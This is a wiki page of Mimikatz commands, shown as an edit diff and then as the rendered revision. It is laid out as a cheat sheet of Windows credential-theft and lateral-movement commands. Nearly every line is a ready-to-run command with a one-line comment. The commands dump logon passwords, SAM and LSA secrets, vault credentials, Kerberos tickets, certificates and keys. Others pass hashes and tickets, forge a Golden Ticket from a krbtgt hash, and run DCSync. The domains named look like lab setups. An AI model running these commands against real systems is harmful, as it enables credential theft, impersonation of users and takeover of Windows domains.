No edit summary |
No edit summary |
||
Line 6: | Line 6: | ||
# Command is used to extract logon passwords from the Windows Security Support Provider (SSP) | # Command is used to extract logon passwords from the Windows Security Support Provider (SSP) | ||
sekurlsa::logonpasswords | sekurlsa::logonpasswords | ||
# Command will extract all logon passwords, including those of network connections. | # Command will extract all logon passwords, including those of network connections. | ||
sekurlsa::logonPasswords full | sekurlsa::logonPasswords full | ||
# Command will export Kerberos tickets to a file. | # Command will export Kerberos tickets to a file. | ||
sekurlsa::tickets /export | sekurlsa::tickets /export | ||
# Command is used to perform a pass-the-hash attack on a Windows system. It attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command. | # Command is used to perform a pass-the-hash attack on a Windows system. It attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command. | ||
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd | sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd | ||
Line 18: | Line 21: | ||
# This command will list and export Kerberos tickets to a file. | # This command will list and export Kerberos tickets to a file. | ||
kerberos::list /export | kerberos::list /export | ||
# This command is used to impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. The specified file is used as the TGT. | # This command is used to impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. The specified file is used as the TGT. | ||
kerberos::ptt c:\chocolate.kirbi | kerberos::ptt c:\chocolate.kirbi | ||
# This command is used to create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. The specified parameters are used to set the properties of the Golden Ticket, such as the administrator account and domain SID | # This command is used to create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. The specified parameters are used to set the properties of the Golden Ticket, such as the administrator account and domain SID | ||
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi | kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi | ||
Line 29: | Line 34: | ||
This command is used to extract cryptographic information from the CryptoAPI (CAPI) of a Windows system. | This command is used to extract cryptographic information from the CryptoAPI (CAPI) of a Windows system. | ||
crypto::capi | crypto::capi | ||
# This command is used to extract cryptographic information from the Cryptography API: Next Generation (CNG) of a Windows system. | # This command is used to extract cryptographic information from the Cryptography API: Next Generation (CNG) of a Windows system. | ||
crypto::cng | crypto::cng | ||
# This command is used to export certificates from a Windows system. | # This command is used to export certificates from a Windows system. | ||
crypto::certificates /export | crypto::certificates /export | ||
# This command is used to export certificates from the local machine certificate store of a Windows system. | # This command is used to export certificates from the local machine certificate store of a Windows system. | ||
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE | crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE | ||
# This command is used to export cryptographic keys from a Windows system. | # This command is used to export cryptographic keys from a Windows system. | ||
crypto::keys /export | crypto::keys /export | ||
# This command is used to export cryptographic keys from the local machine of a Windows system. | # This command is used to export cryptographic keys from the local machine of a Windows system. | ||
crypto::keys /machine /export | crypto::keys /machine /export | ||
Line 66: | Line 76: | ||
Perform a DCSync attack, which is used to replicate Active Directory data from a domain controller. | Perform a DCSync attack, which is used to replicate Active Directory data from a domain controller. | ||
lsadump::dcsync /user:domain\krbtgt /domain:lab.local | lsadump::dcsync /user:domain\krbtgt /domain:lab.local | ||
</syntaxhighlight> | |||
==PTH== | |||
<syntaxhighlight lang="powershell"> | |||
Attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command. | |||
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a | |||
Attempts to authenticate as the specified user with the provided AES-256 hash. | |||
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 | |||
Attempts to authenticate as the specified user with the provided NTLM hash and AES-256 hash. | |||
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 | |||
Attempts to authenticate as the specified user with the provided NTLM hash and runs cmd.exe. | |||
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe | |||
</syntaxhighlight> | </syntaxhighlight> |
Revision as of 18:45, 25 January 2023
Commands
sekurlsa
# Command is used to extract logon passwords from the Windows Security Support Provider (SSP)
sekurlsa::logonpasswords
# Command will extract all logon passwords, including those of network connections.
sekurlsa::logonPasswords full
# Command will export Kerberos tickets to a file.
sekurlsa::tickets /export
# Command is used to perform a pass-the-hash attack on a Windows system. It attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos
# This command will list and export Kerberos tickets to a file.
kerberos::list /export
# This command is used to impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. The specified file is used as the TGT.
kerberos::ptt c:\chocolate.kirbi
# This command is used to create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. The specified parameters are used to set the properties of the Golden Ticket, such as the administrator account and domain SID
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto
This command is used to extract cryptographic information from the CryptoAPI (CAPI) of a Windows system.
crypto::capi
# This command is used to extract cryptographic information from the Cryptography API: Next Generation (CNG) of a Windows system.
crypto::cng
# This command is used to export certificates from a Windows system.
crypto::certificates /export
# This command is used to export certificates from the local machine certificate store of a Windows system.
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
# This command is used to export cryptographic keys from a Windows system.
crypto::keys /export
# This command is used to export cryptographic keys from the local machine of a Windows system.
crypto::keys /machine /export
vault & lsadump
Extracts credentials from the Windows Vault.
vault::cred
Lists the contents of the Windows Vault.
vault::list
Elevates the current user's privileges to that of the Local System account.
token::elevate
Reverts the current user's privileges to their previous state before elevation.
token::revert
Dumps the Security Account Manager (SAM) database, which stores local user account information.
lsadump::sam
Dumps the secrets stored in the Local Security Authority (LSA) of a Windows system.
lsadump::secrets
Dumps the LSA secrets cache, which contains recently used authentication information.
lsadump::cache
Perform a DCSync attack, which is used to replicate Active Directory data from a domain controller.
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
PTH
Attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
Attempts to authenticate as the specified user with the provided AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
Attempts to authenticate as the specified user with the provided NTLM hash and AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
Attempts to authenticate as the specified user with the provided NTLM hash and runs cmd.exe.
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe